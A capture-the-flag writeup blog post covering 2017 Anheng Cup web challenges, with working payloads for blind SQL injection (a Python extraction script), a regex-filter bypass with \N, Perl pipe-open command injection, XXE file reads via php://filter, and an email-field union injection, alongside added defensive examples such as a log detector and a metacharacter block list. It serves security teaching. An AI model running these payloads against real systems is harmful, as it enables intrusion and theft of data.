Sky's blog

Anheng Cup Web Security Test Competition, Autumn Round: selected writeups

2017/10/15

Pupu T1

Visit http://118.178.18.181:57016/index.pl?file=index.pl
and the flag is displayed right away: flag{flag1_song_ni_le}

Information gathering

Just run nslookup:

```
root@sky:~# nslookup 107.182.177.34
Server: 192.168.130.2
Address: 192.168.130.2#53

Non-authoritative answer:
34.177.182.107.in-addr.arpa name = this-is-flag.

Authoritative answers can be found from:
```

The reverse (PTR) record is the flag: this-is-flag

Metadata storage

The challenge text mentioned Mac, so the guess is a macOS metadata file left in the web root:
http://118.178.18.181:57013/.DS_Store
Opening it in HxD shows a file name stored as UTF-16:

```
.s.h.o.w.m.e.f.l.a.g...p.h.p
```

Visit http://118.178.18.181:57013/showmeflag.php
to get the flag: flag{lihailihai666}

A blind injection

I forgot the challenge name, so this title is made up. The challenge is simple, so here is the script directly:

```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests

url = "http://114.55.36.69:57012/"
flag = ""
for i in range(1, 50):            # character position in the extracted value
    for j in range(33, 127):      # printable ASCII candidates
        # Earlier stages of the same probe: database name, table names, column names.
        #payload = "admin 'or ascii(substr((select database()),%s,1))=%d order by 1-- "%(i,j)
        #payload = "admin' or ascii(substr((select group_concat(table_name) from information_schema.TABLES where TABLE_SCHEMA=database()),%s,1))=%d order by 1-- "%(i,j)
        #payload = "admin' or ascii(substr((select group_concat(column_name) from information_schema.columns where TABLE_SCHEMA=database() and TABLE_name='user'),%s,1))=%d order by 1-- "%(i,j)
        payload = "admin' or ascii(substr((select password from user where username='wangmin'),%d,1))=%d order by 1-- " % (i, j)
        data = {
            "name": payload,
            "password": "1"
        }
        r = requests.post(url=url, data=data)
        # "密码错误" (wrong password) is only returned when the injected condition is true,
        # which is the boolean oracle this blind injection relies on.
        if "密码错误" in r.text:
            flag += chr(j)
            print(flag)
            break
```

Solving it gives the username wangmin; the password comes back as an md5 hash, which decrypts to wangmi as well. Log in and you get the flag.
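The script above works because the application answers a true condition and a false one with different messages, one request per candidate character. From the defender's side that traffic pattern is very recognisable: many near-identical requests from one client, each carrying an ascii(substr(...)) comparison with an incrementing position. The following added example (not part of the original post) runs a small detector over a constructed application log; the log format, the IP addresses and the threshold are assumptions.

```python
import re
from collections import Counter

# Constructed application log excerpt (not from the original post): one line per
# login attempt, recording the client IP and the submitted "name" field.
SAMPLE_LOG = """\
10.0.0.7 POST / name="alice"
10.0.0.9 POST / name="admin' or ascii(substr((select database()),1,1))=115 order by 1-- "
10.0.0.9 POST / name="admin' or ascii(substr((select database()),1,1))=116 order by 1-- "
10.0.0.9 POST / name="admin' or ascii(substr((select database()),2,1))=101 order by 1-- "
10.0.0.7 POST / name="bob"
10.0.0.9 POST / name="admin' or ascii(substr((select password from user where username='wangmin'),1,1))=54 order by 1-- "
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) POST \S+ name="(?P<name>.*)"$')

# Shape of one boolean-based blind probe: ascii(substr(<subquery>, <pos>, 1)) = <value>
BLIND_RE = re.compile(
    r"\bascii\s*\(\s*substr(?:ing)?\s*\(.*?\)\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)",
    re.I | re.S,
)

def extract_probe(name):
    """Return (position, compared_value) if the field looks like a blind probe, else None."""
    m = BLIND_RE.search(name)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))

def find_blind_sqli(log_text, threshold=3):
    """Count probe-shaped requests per client IP and report the IPs at or above threshold."""
    probes = Counter()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        if extract_probe(m.group("name")) is not None:
            probes[m.group("ip")] += 1
    return {ip: n for ip, n in probes.items() if n >= threshold}

if __name__ == "__main__":
    print(find_blind_sqli(SAMPLE_LOG))   # {'10.0.0.9': 4}
```

The signature is deliberately narrow (it keys on the substr/ascii comparison rather than on the word "select"), which keeps false positives low on ordinary login traffic; the real fix on the application side is a parameterised query plus a single, identical error message for "no such user" and "wrong password", which removes the oracle entirely.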

babysql2

The challenge hands out the source at http://118.178.18.181:57019/source.php

```php
<?php
include "config.php";
echo "<center><h1>Welcome to my site</h1></center><br>";
$id = $_GET['id']?waf($_GET['id']):1;

$sql = "select * from error_news where id = $id";
echo "<!--view source /source.php-->";
$row = mysql_fetch_array(mysql_query($sql));
if (empty($row) or mysql_error()){
    echo "<center>no content detail</center>".mysql_error();
}else{
    echo "<center><table border=1><tr><th>title</th><th>Content</th></tr><tr><td>${row['title']}</td><td>${row['content']}</td></tr></table></center>";
}


function waf($var){
    if(stristr($_SERVER['HTTP_USER_AGENT'],'sqlmap')){
        echo "<center>hacker<center>";
        die();
    }
    $var = preg_replace('/([^a-z]+)(union|from)/i', '&#160;$2', $var);
    return $var;
}
```

The key filter:

```php
$var = preg_replace('/([^a-z]+)(union|from)/i', '&#160;$2', $var);
```

Bypass:
http://118.178.18.181:57019/?id= \Nunion select 1,flag,\Nfrom flag
MySQL reads \N as the literal NULL, and because N is a letter there is no run of non-letters directly before union or from for the regex to match, so the filter leaves the string alone. What actually reaches the database is:
http://118.178.18.181:57019/?id=null union select 1,flag,null from flag
That is why the content column in the output is empty. This bypasses the waf and gives the flag:
flag{7cfa7faeb83602f86b882bf511faf225}
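The filter above is a blocklist keyed on what usually precedes a keyword, and the writeup's \N trick shows the gap. Since id is only ever a number, the control that cannot be bypassed is to accept nothing but an integer. The following added example (not from the original post or the challenge) ports the waf() regex to Python to show exactly which inputs it rewrites and which it leaves untouched, next to the positive check that should replace it; the sample inputs are the ones from the writeup.

```python
import re

# Python port of the waf() regex from the challenge source (PCRE /i -> re.IGNORECASE).
# Only a run of NON-letters directly before "union"/"from" is rewritten to "&#160;".
WAF_RE = re.compile(r"([^a-z]+)(union|from)", re.I)

def waf(value):
    """Mirror of preg_replace('/([^a-z]+)(union|from)/i', '&#160;$2', $var)."""
    return WAF_RE.sub(r"&#160;\2", value)

def parse_id(value):
    """Positive control: id is numeric, so accept only an unsigned integer literal.
    Returns the int, or None for anything else (which the caller then rejects)."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return int(value)
    return None

# Ordinary injection attempt: a space precedes both keywords, so both get mangled.
ORDINARY = "1 union select 1,flag,2 from flag"
# \N is MySQL's literal spelling of NULL; 'N' is a letter, so [^a-z]+ cannot sit
# immediately before "union"/"from" and the filter leaves the string untouched.
BYPASS = r"\Nunion select 1,flag,\Nfrom flag"

if __name__ == "__main__":
    for s in (ORDINARY, BYPASS, "7"):
        print("%-40r -> waf: %-45r parse_id: %r" % (s, waf(s), parse_id(s)))
```

Run it and the ordinary payload comes back as `&#160;union select 1,flag&#160;from flag` (broken SQL), the \N payload comes back unchanged, and parse_id() rejects both while accepting `7`; in PHP the equivalent is casting with (int) or validating with ctype_digit() before the value is interpolated.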

Pupu T2

Again a file read:

```perl
#!/usr/bin/perl
use CGI qw(:standard);
require "flag.pl";
foreach (qw(ENV BASH_ENV CDPATH IFS TERM)) { delete $ENV{$_} };
$ENV{PATH} = '/bin:/usr/bin';
print header(-type => 'text/html', -charset => "utf-8");
local $file = param('file');
local $html;
if ($file =~ /flag/i)
{
    print("not that easy\n");
    die;
}
# Two-argument open(): a file name ending in "|" is run as a command instead of opened.
open(file, "$file") || print "error: couldnt open $file : $!\n";
while (<file>)
{
    $html .= $_;
}
close(file);
print $html;
```

payload:

```
cat '/var/www/html/fl'ag'.pl'|
```

The two-argument open treats a name that ends in | as a command to run, and the single quotes split the word so that the /flag/i check never sees "flag". Perl syntax was the point being tested... emmmmmmm
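The Perl-side fix is the three-argument form, open(my $fh, '<', $file), which never interprets the name as a command. The more general lesson is that a user-supplied file name has to be confined before it is opened at all. As an added example in Python (not part of the original post; the document root is an assumption), the following resolves a requested name inside a directory and refuses absolute paths, traversal and shell metacharacters, so the payload above is rejected before any open.

```python
import os

# Assumed document root for this example (not taken from the challenge).
DOCROOT = "/var/www/html"

# Characters that have meaning to a shell or to Perl's two-argument open();
# none of them belong in a plain file name served from a web root.
FORBIDDEN = set("|<>;&`$'\"\0")

def resolve_in_docroot(docroot, requested):
    """Return the absolute path of `requested` if it stays inside `docroot`,
    otherwise None. Absolute paths, '..' traversal and shell metacharacters
    are all refused before anything is opened."""
    if not requested or FORBIDDEN & set(requested):
        return None
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

def read_in_docroot(docroot, requested):
    """Open the file only after the name has been confined to the document root."""
    path = resolve_in_docroot(docroot, requested)
    if path is None:
        raise PermissionError("refused: %r" % requested)
    with open(path, "rb") as fh:
        return fh.read()

if __name__ == "__main__":
    for name in ("index.pl", "../../etc/passwd", "/etc/passwd",
                 "cat '/var/www/html/fl'ag'.pl'|"):
        print("%-40r -> %r" % (name, resolve_in_docroot(DOCROOT, name)))
```

Only index.pl resolves; the traversal, the absolute path and the pipe payload all come back as None. Note that the check is on the resolved path, not on the string, so a symlink inside the web root that points outside it is also caught.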

readme

Got the challenge at http://114.55.36.69:57018/
It looked like XXE injection, so I tried:

```
data=<%3fxml+version%3d"1.0"+encoding%3d"utf-8"%3f>+
<!DOCTYPE+xdsec+[
<!ELEMENT+methodname+ANY+>
<!ENTITY+xxe+SYSTEM+"php://filter/convert.base64-encode/resource=index.php"+>]>
<methodcall>
<methodname>%26xxe%3b</methodname>
</methodcall>
```
which yields the base64-encoded source:

```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>XML</title>
<link rel="stylesheet" href="./css/bootstrap.min.css">
<script src="./css/jquery.min.js"></script>
<script src="./css/bootstrap.min.js"></script>
</head>
<body>

<form role="form" id="form" method="POST" action="index.php">
<div class="form-group">
<label for="name">XML</label>
<textarea class="form-control" rows="6" name="data" placeholder='
<code>
<body>Hello World!</body>
</code>
'></textarea>
</div>
<div class="btn-group">
<button type="button" class="btn btn-default" onclick="document.getElementById('form').submit()">SUBMIT</button>
</div>
<?php
error_reporting(0);

include("flag.php");

if(isset($_POST['data']) and $_POST['data'] != "") {
    $xml = simplexml_load_string($_POST['data'], null, LIBXML_NOENT);
    echo "<pre>";
    var_dump($xml);
    echo "</pre>";
}

?>
</form>

</body>
</html>
```
So read flag.php:

```
data=<%3fxml+version%3d"1.0"+encoding%3d"utf-8"%3f>+
<!DOCTYPE+xdsec+[
<!ELEMENT+methodname+ANY+>
<!ENTITY+xxe+SYSTEM+"php://filter/convert.base64-encode/resource=flag.php"+>]>
<methodcall>
<methodname>%26xxe%3b</methodname>
</methodcall>
```

Decoding the base64 directly gave mojibake, so I wrote a small Python script:

```python
import base64

# Decode in binary mode: the decoded PHP is bytes, not text, which is what
# caused the garbled output when decoding it as a string.
f = open('./base.txt', 'rb')
output = open('./flag.php', 'wb')
output.write(base64.b64decode(f.read()))
output.close()
f.close()
```

Then it turned out the flag.php obtained was obfuscated with phpjm...
After that, 2 yuan gets you the flag; the decoding site: http://www.yunlu99.com/
(If you are strong enough, debugging it may also work.)

findpsw is ready

Visit http://114.55.36.69:57014/f1ndmyp4ssw0rdnineverno.php
A page that looked familiar... and then it turned out the source was available:

```php
<?php
header("Content-Type:text/html;charset=utf8");
include "config.php";
// 1.sql
if ($_SERVER["REQUEST_METHOD"]=="GET"){
    echo include "tpl.php";
}else if ($_SERVER["REQUEST_METHOD"]=="POST"){

    $mail = mywaf($_POST['mail']);
    $sql = "select * from users where mail='$mail'";
    $res = mysql_query($sql);
    $row = mysql_fetch_array($res);
    if (!empty($row['password'])){
        mymail($mail);
        $output = "新的密码已经发送到您的邮箱$mail,请查收";

    }else{
        $output = "邮箱不存在,请重试";
    }
    echo include "tpl.php";
}

function mywaf($mail){
    if(!preg_match("/^[a-z0-9\s,\-']+@([a-z0-9]+\.)+[a-z0-9]{1,5}$/i",$mail)){
        $output="非法邮箱,请重试";
        echo include "tpl.php";
        exit();
    }else{
        return $mail;
    }
}

function mymail($mail){

    mail($mail,'flag','flag{***********}');
}
```

I casually tested the payload from last time:

```
mail=' union select 1,2,3,4 -- @admin.com
```

Response:

```
新的密码已经发送到您的邮箱' union select 1,2,3,4 -- @admin.com,请查收
```
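The regex in mywaf() is an allow-list, but a generous one: whitespace, comma, hyphen and apostrophe are all permitted before the @, which is exactly the character set the injection above needs, and the value is then interpolated straight into the query. The following added example (not from the original post or the challenge; the four-column users table and the stricter pattern are assumptions) ports the pattern to Python, runs the same query against an in-memory SQLite table both interpolated as in the source and as a bound parameter, and shows a tighter allow-list that rejects the payload outright.

```python
import re
import sqlite3

# Port of the mywaf() allow-list from the challenge source (PCRE /i -> re.I).
MAIL_RE = re.compile(r"^[a-z0-9\s,\-']+@([a-z0-9]+\.)+[a-z0-9]{1,5}$", re.I)

# A tighter allow-list (assumption: only ordinary addresses are needed): no
# whitespace, quotes or commas anywhere, and a letters-only top-level label.
STRICT_MAIL_RE = re.compile(r"^[a-z0-9._%+-]+@([a-z0-9-]+\.)+[a-z]{2,}$", re.I)

# The payload from the writeup.
PAYLOAD = "' union select 1,2,3,4 -- @admin.com"

def make_db():
    """In-memory stand-in for the users table (layout is an assumption: 4 columns)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer, name text, mail text, password text)")
    conn.execute("insert into users values (1, 'admin', 'admin@example.org', 'secret')")
    return conn

def lookup_vulnerable(conn, mail):
    """String interpolation, as in the challenge: the mail value becomes SQL."""
    sql = "select * from users where mail='%s'" % mail
    return conn.execute(sql).fetchone()

def lookup_safe(conn, mail):
    """Bound parameter: the same value is data, never SQL."""
    return conn.execute("select * from users where mail=?", (mail,)).fetchone()

if __name__ == "__main__":
    conn = make_db()
    print("loose allow-list accepts payload :", bool(MAIL_RE.match(PAYLOAD)))         # True
    print("strict allow-list accepts payload:", bool(STRICT_MAIL_RE.match(PAYLOAD)))  # False
    print("interpolated query returns       :", lookup_vulnerable(conn, PAYLOAD))     # (1, 2, 3, 4)
    print("parameterised query returns      :", lookup_safe(conn, PAYLOAD))           # None
```

With the interpolated query the union row (1, 2, 3, 4) satisfies the !empty($row['password']) check, so mymail() fires and the flag is mailed to whatever follows the comment marker; with the bound parameter no row matches and nothing is sent. The allow-list tightening is worth doing as well, but it is the parameterised query that removes the bug.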

That immediately suggested standing up my own mail server to receive the message. So, the all-purpose Python; reference: Pymotw.com/2/smtpd
The code:

```python
import smtpd
import asyncore
# Note: the smtpd and asyncore modules were removed from the standard library in Python 3.12.

class CustomSMTPServer(smtpd.SMTPServer):

    # Python 3.5+ passes extra keyword arguments (mail_options, rcpt_options).
    def process_message(self, peer, mailfrom, rcpttos, data, **kwargs):
        print('Receiving message from:', peer)
        print('Message addressed from:', mailfrom)
        print('Message addressed to  :', rcpttos)
        print('Message length        :', len(data))
        print(data)
        return

# decode_data=True delivers the message body as str rather than bytes.
server = CustomSMTPServer(('0.0.0.0', 25), None, decode_data=True)

asyncore.loop()
```

Then run this file on the server, point the domain's DNS (MX) at it, and the mail arrives carrying the flag.
